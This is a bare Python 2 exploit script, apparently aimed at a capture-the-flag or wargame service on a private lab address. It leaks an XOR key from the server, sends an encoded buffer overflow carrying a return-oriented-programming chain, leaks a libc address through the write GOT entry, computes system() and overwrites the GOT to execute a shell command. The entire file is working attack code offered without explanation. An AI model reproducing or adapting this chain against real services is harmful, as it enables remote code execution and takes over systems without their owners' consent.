from socket import *
from struct import *
import time
def cipher(s,key):
i=0
after=""
while i<len(s):
after += chr(ord(s[i])^ ord(key[i%128]))
i=i+1
return after
read = 0x8048860
write = 0x080489c0
ppppr = 0x80499bc
bss = 0x0804b520
write_got = 0x804b3dc
s = socket(AF_INET, SOCK_STREAM)
s.connect(('192.168.197.130',20002))
time.sleep(1)
s.recv(1024)
msg="\x00"*128
s.send("E"+pack('<I',len(msg))+msg)
s.recv(121)
size=unpack('<I',s.recv(4))[0]
s.recv(1)
key = ""
while len(key) < 128:
key += s.recv(1024)
print "[+] Get xor key"
cmd="id\x00"
payload = "A"*131088
payload += pack('<I',read)
payload += pack('<I',ppppr+1)
payload += pack('<I',0)
payload += pack('<I',bss)
payload += pack('<I',len(cmd))
payload += pack('<I',write)
payload += pack('<I',ppppr+1)
payload += pack('<I',1)
payload += pack('<I',write_got)
payload += pack('<I',4)
payload += pack('<I',read)
payload += pack('<I',ppppr+1)
payload += pack('<I',0)
payload += pack('<I',write_got)
payload += pack('<I',4)
payload += pack('<I',write) # system
payload += "AAAA"
payload += pack('<I',bss)
payload = cipher(payload,key)
s.send("E"+pack('<I',len(payload))+payload)
s.recv(121)
total=0
while total < len(payload):
total += len(s.recv(65000))
s.send("Q")
s.send(cmd)
get = s.recv(4)
write_addr = unpack('<I',"0"*(4-len(get))+get)[0]
system_addr = write_addr - 0xc12c0 + 0x3cb20
print "[+] System: "+hex(system_addr)
s.send(pack('<I',system_addr))
print s.recv(1024)
s.close()